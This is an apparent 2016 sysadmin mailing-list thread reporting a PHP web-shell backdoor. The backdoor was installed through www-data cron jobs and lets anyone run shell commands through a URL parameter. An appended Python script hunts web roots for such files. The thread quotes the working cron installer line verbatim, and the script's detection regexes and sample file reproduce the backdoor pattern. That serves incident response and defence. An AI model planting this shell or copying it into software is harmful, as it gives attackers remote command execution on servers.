[Systems] Found a backdoor

Bernie Innocenti bernie at codewiz.org
Tue Mar 1 01:21:54 EST 2016


On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> Remember in June we had an incident with a broken Wordpress site.
> I switched to static generator since then.
> 
> +1 on containers just learning more about them and finding them fascinating.
> Count me in on containerizing everything.
> 
> I'm not aware of other wordpress sites. Maybe walter's blog?
> Wordpress is a PIA IMHO.

Yes, WP is riddled with security holes. Back in October, Samuel helped
Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
that the WP instance is now fully patched and locked down?


> Regards,
> Sebastian
> 
> 
> On 25/02/16 04:47, Bernie Innocenti wrote:
>> While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
>> that www-data was executing commands like these:
>>
>> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
>> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>>
>> Did you spot the system()? This executes arbitrary commands specified
>> via the "localtime" url parameter. Uh-oh.
>>
>> There were about a dozen lines like the above, installing .cache.php in
>> various virtualhosts. I kept a copy of the file in
>> /root/www-data.backdoor. The file was last written on Jun 23  2015,
>> which may correlate with the switch to the new website.
>>
>> I cleared the mess and searched the logs for requests containing
>> "localtime", but couldn't find any. I wonder if they could filter the
>> logs, since they were previously writable by www-data.
>>
>> Please watch out. We should ensure directories accessible over http are
>> not writable by user www-data, especially those in which PHP and CGIs
>> are enabled.
>>
>> Running several large sites under the same uid has always been a bad
>> security practice, and looking forward we should keep migrating them to
>> properly isolated containers.
>>
>> Finally, Wordpress is particularly dangerous and we should update and
>> harden all instances. Can someone please take care of this? I'll do
>> Mediawiki, which I know pretty well.
>>
> 


-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org
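An added example, not code from the thread: a small Python audit that hunts a web root for PHP files of the kind the cron job above dropped (request input fed to a command-execution call) and reports whether each hit is a dot-file or sits in a directory writable by the web server user. The web server user's uid and group ids are assumed to be supplied by the caller, and the sample files it writes are constructed for illustration.

```python
"""Hunt for PHP web shells like the .cache.php dropped by the cron job above:
flag PHP files under a web root that both read request input and call a
command-execution function, noting if the web server user could write there."""
import os
import re
import tempfile

# Command-execution calls, optionally '@'-silenced as in the found backdoor.
EXEC_CALL = re.compile(r"@?\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I)
REQUEST_VAR = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def looks_like_shell(source: str) -> bool:
    # Request input and a command-execution call in the same file is the signal.
    return bool(EXEC_CALL.search(source)) and bool(REQUEST_VAR.search(source))


def dir_writable_by(path: str, uid: int, gids: set) -> bool:
    # Approximate "could this uid write here" from owner/group/other mode bits.
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & 0o200:
        return True
    if st.st_gid in gids and st.st_mode & 0o020:
        return True
    return bool(st.st_mode & 0o002)


def audit(web_root: str, uid: int, gids: set) -> list:
    # One finding dict per suspicious PHP file under web_root.
    findings = []
    for dirpath, _dirs, files in os.walk(web_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            if looks_like_shell(source):
                findings.append({"path": full, "hidden": name.startswith("."),
                                 "dir_writable": dir_writable_by(dirpath, uid, gids)})
    return findings


def make_sample_root() -> str:
    # Constructed sample tree: a cut-down copy of the found backdoor plus two benign files.
    root = tempfile.mkdtemp()
    samples = {".cache.php": '<?php $t = $_GET["localtime"]; @system($t); ?>',
               "search.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',  # input, no exec
               "cron.php": '<?php system("date"); ?>'}  # exec, no request input
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return root
```

Run it against a real virtualhost with the uid and gids of www-data (for example from `pwd`/`grp`) to list files worth a manual look; the pattern match is a triage aid, not proof of compromise.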

